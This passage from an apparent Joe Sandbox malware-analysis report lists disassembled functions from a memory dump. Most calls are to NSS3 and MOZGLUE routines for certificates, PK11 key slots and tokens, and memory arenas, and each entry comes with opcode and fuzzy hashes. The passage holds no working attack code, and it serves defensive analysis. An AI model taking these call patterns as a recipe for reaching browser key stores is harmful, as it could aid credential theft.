Part of subcall function 6CEDFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CEDFBB1

PR_CallOnce.NSS3(6CFE2AA4,6CEE12D0), ref: 6CE83F02
PL_FreeArenaPool.NSS3 ref: 6CE83F14
PL_FinishArenaPool.NSS3 ref: 6CE83F1C

Part of subcall function 6CEE64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CEE127C,00000000,00000000,00000000), ref: 6CEE650E

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CE83F27

Strings

security, xrefs: 6CE83EBC

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$ArenaItem_$Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_Zfreefreememcpy
String ID: security
API String ID: 1076417423-3315324353
Opcode ID: 96e65d4a98152d3243a31a5e76a06d91e0677abdc7b346b1a6129f525f453251
Instruction ID: 8a06260369c8eb79d275bbefee240648dfd18c89f6f086928128d1306ba00850
Opcode Fuzzy Hash: 96e65d4a98152d3243a31a5e76a06d91e0677abdc7b346b1a6129f525f453251
Instruction Fuzzy Hash: DD213AB29043006BD3148B15AC02F9B77B8FB4974CF14093DF949A7742F731E9188796

Function 6CECCC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6CECCD08
PK11_DoesMechanism.NSS3(?,?), ref: 6CECCE16
PR_SetError.NSS3(00000000,00000000), ref: 6CECD079

Part of subcall function 6CF2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF2C2BF

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: 787451b89f79bbf1f7a70469913243059987591a6632428e7629c6dbecf92053
Instruction ID: 1e2c4a0aa554a49dad99ffdad9d371f41a9ba9221d78c70ebc5b404bdd671965
Opcode Fuzzy Hash: 787451b89f79bbf1f7a70469913243059987591a6632428e7629c6dbecf92053
Instruction Fuzzy Hash: B0C1BFB5A002199FDB10CF28CD81BDAB7B5BB48308F2441A8E85897741E775EE95CF82

Function 6CEBDC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6CEC97C1,?,00000000,00000000,?,?,?,00000000,?,6CEA7F4A,00000000), ref: 6CEBDC68

Part of subcall function 6CEE0BE0: malloc.MOZGLUE(6CED8D2D,?,00000000,?), ref: 6CEE0BF8
Part of subcall function 6CEE0BE0: TlsGetValue.KERNEL32(6CED8D2D,?,00000000,?), ref: 6CEE0C15

PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6CEA7F4A,00000000,?,00000000,00000000), ref: 6CEBDD36
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CEA7F4A,00000000,?,00000000,00000000), ref: 6CEBDE2D
memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6CEA7F4A,00000000,?,00000000,00000000), ref: 6CEBDE43
PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6CEA7F4A,00000000,?,00000000,00000000), ref: 6CEBDE76
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CEA7F4A,00000000,?,00000000,00000000), ref: 6CEBDF32
memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6CEA7F4A,00000000,?,00000000,00000000), ref: 6CEBDF5F
PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6CEA7F4A,00000000,?,00000000,00000000), ref: 6CEBDF78
PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6CEA7F4A,00000000,?,00000000,00000000), ref: 6CEBDFAA

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Alloc_Util$memcpy$Valuemalloc
String ID:
API String ID: 1886645929-0
Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction ID: 84e8b08f66cae00a13b789f682dfd56a03babc2f3b642b27c9cea28788750a24
Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction Fuzzy Hash: 5681E578E065048BFB144E58CAA037972B2DB6534CF34843AF55AEAFE9D778D784C602

Function 6CE93C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_GetCertFromPrivateKey.NSS3(?), ref: 6CE93C76
CERT_DestroyCertificate.NSS3(00000000), ref: 6CE93C94

Part of subcall function 6CE895B0: TlsGetValue.KERNEL32(00000000,?,6CEA00D2,00000000), ref: 6CE895D2
Part of subcall function 6CE895B0: EnterCriticalSection.KERNEL32(?,?,?,6CEA00D2,00000000), ref: 6CE895E7
Part of subcall function 6CE895B0: PR_Unlock.NSS3(?,?,?,?,6CEA00D2,00000000), ref: 6CE89605

PORT_NewArena_Util.NSS3(00000800), ref: 6CE93CB2
PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6CE93CCA
memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6CE93CE1

Part of subcall function 6CE93090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CEAAE42), ref: 6CE930AA
Part of subcall function 6CE93090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CE930C7
Part of subcall function 6CE93090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CE930E5
Part of subcall function 6CE93090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CE93116
Part of subcall function 6CE93090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CE9312B
Part of subcall function 6CE93090: PK11_DestroyObject.NSS3(?,?), ref: 6CE93154
Part of subcall function 6CE93090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE9317E

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
String ID:
API String ID: 3167935723-0
Opcode ID: 11303f571345769e7ee674890ad58657e52e54208a08b6e20d13aa4bb783248e
Instruction ID: 1a6ba3da487bd674ea6248bb2f47898d44d9520cec7503b02e238c9c607bdc37
Opcode Fuzzy Hash: 11303f571345769e7ee674890ad58657e52e54208a08b6e20d13aa4bb783248e
Instruction Fuzzy Hash: 9161C675A00300BBEB115FA5DC41FAB76B9EF0474CF284068FE5A9AB52F721D914C7A2

Function 6CED3D40 Relevance: 13.7, APIs: 9, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 6CED3440: PK11_GetAllTokens.NSS3 ref: 6CED3481
Part of subcall function 6CED3440: PR_SetError.NSS3(00000000,00000000), ref: 6CED34A3
Part of subcall function 6CED3440: TlsGetValue.KERNEL32 ref: 6CED352E
Part of subcall function 6CED3440: EnterCriticalSection.KERNEL32(?), ref: 6CED3542
Part of subcall function 6CED3440: PR_Unlock.NSS3(?), ref: 6CED355B

TlsGetValue.KERNEL32 ref: 6CED3D8B
EnterCriticalSection.KERNEL32(?), ref: 6CED3D9F
PR_Unlock.NSS3(?), ref: 6CED3DCA
PR_SetError.NSS3(00000000,00000000), ref: 6CED3DE2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6CED3E4F

Part of subcall function 6CF2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF2C2BF

TlsGetValue.KERNEL32 ref: 6CED3E97
EnterCriticalSection.KERNEL32(?), ref: 6CED3EAB
PR_Unlock.NSS3(?), ref: 6CED3ED6
PR_SetError.NSS3(00000000,00000000), ref: 6CED3EEE

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
String ID:
API String ID: 2554137219-0
Opcode ID: 1e1953c763749eff92dc2218a9b571e1699a26ee6754404b37344c4d77217fbf
Instruction ID: c8826c10e0b86dd10783c7f6a916da52939af08a10cd02db31e5b6ff4f547300
Opcode Fuzzy Hash: 1e1953c763749eff92dc2218a9b571e1699a26ee6754404b37344c4d77217fbf
Instruction Fuzzy Hash: 6A5125B2E007029FEB41AF69D84476673B4AF45318F260528DE094BB62EB31F946CBD1

Function 6CE82C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(EF8FC49E), ref: 6CE82C5D

Part of subcall function 6CEE0D30: calloc.MOZGLUE ref: 6CEE0D50
Part of subcall function 6CEE0D30: TlsGetValue.KERNEL32 ref: 6CEE0D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CE82C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CE82CE0

Part of subcall function 6CE82E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CE82CDA,?,00000000), ref: 6CE82E1E
Part of subcall function 6CE82E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CE82E33
Part of subcall function 6CE82E00: TlsGetValue.KERNEL32 ref: 6CE82E4E
Part of subcall function 6CE82E00: EnterCriticalSection.KERNEL32(?), ref: 6CE82E5E
Part of subcall function 6CE82E00: PL_HashTableLookup.NSS3(?), ref: 6CE82E71
Part of subcall function 6CE82E00: PL_HashTableRemove.NSS3(?), ref: 6CE82E84
Part of subcall function 6CE82E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CE82E96
Part of subcall function 6CE82E00: PR_Unlock.NSS3 ref: 6CE82EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE82D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6CE82D30
CERT_MakeCANickname.NSS3(00000001), ref: 6CE82D3F
free.MOZGLUE(00000000), ref: 6CE82D73
CERT_DestroyCertificate.NSS3(?), ref: 6CE82DB8
free.MOZGLUE ref: 6CE82DC8

Part of subcall function 6CE83E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE83EC2
Part of subcall function 6CE83E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CE83ED6
Part of subcall function 6CE83E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CE83EEE
Part of subcall function 6CE83E60: PR_CallOnce.NSS3(6CFE2AA4,6CEE12D0), ref: 6CE83F02
Part of subcall function 6CE83E60: PL_FreeArenaPool.NSS3 ref: 6CE83F14
Part of subcall function 6CE83E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CE83F27

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: 206c7d11d32bb0b5b4ac170c2fb7ed384463340a6cfa590eb409e61ffcfb666f
Instruction ID: a724954450a4fdf1efc8099dbc7baf5e5c44ba9611430f1ab92ace5d4d310f0f
Opcode Fuzzy Hash: 206c7d11d32bb0b5b4ac170c2fb7ed384463340a6cfa590eb409e61ffcfb666f
Instruction Fuzzy Hash: 0A51D071A063119BDB019E68CC88B6B7BF5EFA434CF24042CEC5997790E731E815CB92

Function 6CEA8F70 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6CE9DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CEA8FAF
PR_Now.NSS3(?,?,00000002,?,?,?,6CE9DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CEA8FD1
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CE9DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CEA8FFA
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CE9DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CEA9013
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CE9DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CEA9042
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CE9DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CEA905A
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CE9DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CEA9073
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CE9DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CEA90EC

Part of subcall function 6CE70F00: PR_GetPageSize.NSS3(6CE70936,FFFFE8AE,?,6CE016B7,00000000,?,6CE70936,00000000,?,6CE0204A), ref: 6CE70F1B
Part of subcall function 6CE70F00: PR_NewLogModule.NSS3(clock,6CE70936,FFFFE8AE,?,6CE016B7,00000000,?,6CE70936,00000000,?,6CE0204A), ref: 6CE70F25

PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CE9DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CEA9111

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
String ID:
API String ID: 2831689957-0
Opcode ID: e4da788c6adb5bd2fe22856c5b679fb00614e122e688e0f1a9c28995ef051fb0
Instruction ID: 2db36372f27790da4a618e83c50388e17e80fbcff45d2cfddd7e37725dc71f43
Opcode Fuzzy Hash: e4da788c6adb5bd2fe22856c5b679fb00614e122e688e0f1a9c28995ef051fb0
Instruction Fuzzy Hash: E551AF75A046058FCF40EFB9C4C8359BBF4AF0A318F264569DC449B706EB36E886CB81

Function 6CE87CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CE840D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6CE83F7F,?,00000055,?,?,6CE81666,?,?), ref: 6CE840D9
Part of subcall function 6CE840D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6CE81666,?,?), ref: 6CE840FC
Part of subcall function 6CE840D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6CE81666,?,?), ref: 6CE84138

PR_GetCurrentThread.NSS3 ref: 6CE87CFD

Part of subcall function 6CF49BF0: TlsGetValue.KERNEL32(?,?,?,6CF90A75), ref: 6CF49C07

SECITEM_ItemsAreEqual_Util.NSS3(?,6CFA9030), ref: 6CE87D1B

Part of subcall function 6CEDFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6CE81A3E,00000048,00000054), ref: 6CEDFD56

SECITEM_ItemsAreEqual_Util.NSS3(?,6CFA9048), ref: 6CE87D2F
SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6CE87D50
PR_GetCurrentThread.NSS3 ref: 6CE87D61
PORT_ArenaMark_Util.NSS3(?), ref: 6CE87D7D
free.MOZGLUE(?), ref: 6CE87D9C
CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6CE87DB8
PR_SetError.NSS3(FFFFE023,00000000), ref: 6CE87E19

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
String ID:
API String ID: 70581797-0
Opcode ID: fc63cef295338656845027e80b6947f74035f8fc86e289da92f4dd10075630a5
Instruction ID: aa3799c9377c457fe1d25ff4fefc02b86eada16410818e52049e61a5772404b5
Opcode Fuzzy Hash: fc63cef295338656845027e80b6947f74035f8fc86e289da92f4dd10075630a5
Instruction Fuzzy Hash: 7A41F672B011199BDB008E699C41BAF37F8AF4629CF250028FC1DA7791EB31ED15C7A1

Function 6CE97EB0 Relevance: 13.6, APIs: 9, Instructions: 124threadCOMMON

Download Yara Rule

APIs

free.MOZGLUE(?,00000000,00000000,?,?,?,6CE980DD), ref: 6CE97F15
DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,6CE980DD), ref: 6CE97F36
free.MOZGLUE(?,?,?,6CE980DD), ref: 6CE97F3D
SECOID_Shutdown.NSS3(00000000,00000000,?,?,?,6CE980DD), ref: 6CE97F5D
DeleteCriticalSection.KERNEL32(?,6CE980DD), ref: 6CE97F94
free.MOZGLUE(?), ref: 6CE97F9B
PR_SetError.NSS3(FFFFE08B,00000000,6CE980DD), ref: 6CE97FD0
PR_SetThreadPrivate.NSS3(FFFFFFFF,00000000,6CE980DD), ref: 6CE97FE6
free.MOZGLUE(?,6CE980DD), ref: 6CE9802D

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection$ErrorPrivateShutdownThread
String ID:
API String ID: 4037168058-0
Opcode ID: d27d31b1c2370545e9d2900f58250bf55bb4952c17975dcde6caf0659bac6ce7
Instruction ID: 36138dadb41106d10c79bd2138c3680913ac61ea478508a4e9869cc9175e9993
Opcode Fuzzy Hash: d27d31b1c2370545e9d2900f58250bf55bb4952c17975dcde6caf0659bac6ce7
Instruction Fuzzy Hash: B1413B71F112016FDFD09FB88889B4B3775AB4B358F22022DE51A93B40EB36E509CB90

Function 6CEDFEE0 Relevance: 13.6, APIs: 9, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEDFF00

Part of subcall function 6CF2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF2C2BF

PORT_ArenaMark_Util.NSS3(?), ref: 6CEDFF18
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CEDFF26
PORT_ArenaMark_Util.NSS3(?), ref: 6CEDFF4F
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CEDFF7A
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CEDFF8C

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_Mark_$ErrorValuememset
String ID:
API String ID: 1233137751-0
Opcode ID: 881f11d3c6c323bb5851fe3db2193ccac8de6886eeaff1a022bd829e579336e3
Instruction ID: 6c4cda35bbd650b9bbb91dd5219079f6f66423de45613b0144cb6593891f44a0
Opcode Fuzzy Hash: 881f11d3c6c323bb5851fe3db2193ccac8de6886eeaff1a022bd829e579336e3
Instruction Fuzzy Hash: 2F3126B29013529BE710CF949C42B5B76B8AF4A38CF364539ED1897741EB34E906C7D2

Function 6CEE3CA0 Relevance: 13.6, APIs: 9, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,-00000001,?,00000000,?,6CEE38BD), ref: 6CEE3CBE
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,?,-00000001,?,00000000,?,6CEE38BD), ref: 6CEE3CD1

Part of subcall function 6CEE0BE0: malloc.MOZGLUE(6CED8D2D,?,00000000,?), ref: 6CEE0BF8
Part of subcall function 6CEE0BE0: TlsGetValue.KERNEL32(6CED8D2D,?,00000000,?), ref: 6CEE0C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6CEE38BD), ref: 6CEE3CF0
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6CFBB369,000000FF,00000000,00000000,?,000000FF,00000000,00000000,6CEE38BD), ref: 6CEE3D0B
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,6CEE38BD), ref: 6CEE3D1A
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6CFBB369,000000FF,00000000,00000000,00000000,6CEE38BD), ref: 6CEE3D38
_wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000), ref: 6CEE3D47
free.MOZGLUE(00000000), ref: 6CEE3D62
free.MOZGLUE(000000FF,?,000000FF,00000000,00000000,6CEE38BD), ref: 6CEE3D6F

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_Utilfree$Value_wfopenmalloc
String ID:
API String ID: 2345246809-0
Opcode ID: da79596ae0465902b0cbc5787a02517e214dec1a24e9e6cccd104f0fc4e5a6c7
Instruction ID: a009fe967891997e780db5404a79cb37a2699ec9cf7346a70729c88859d68825
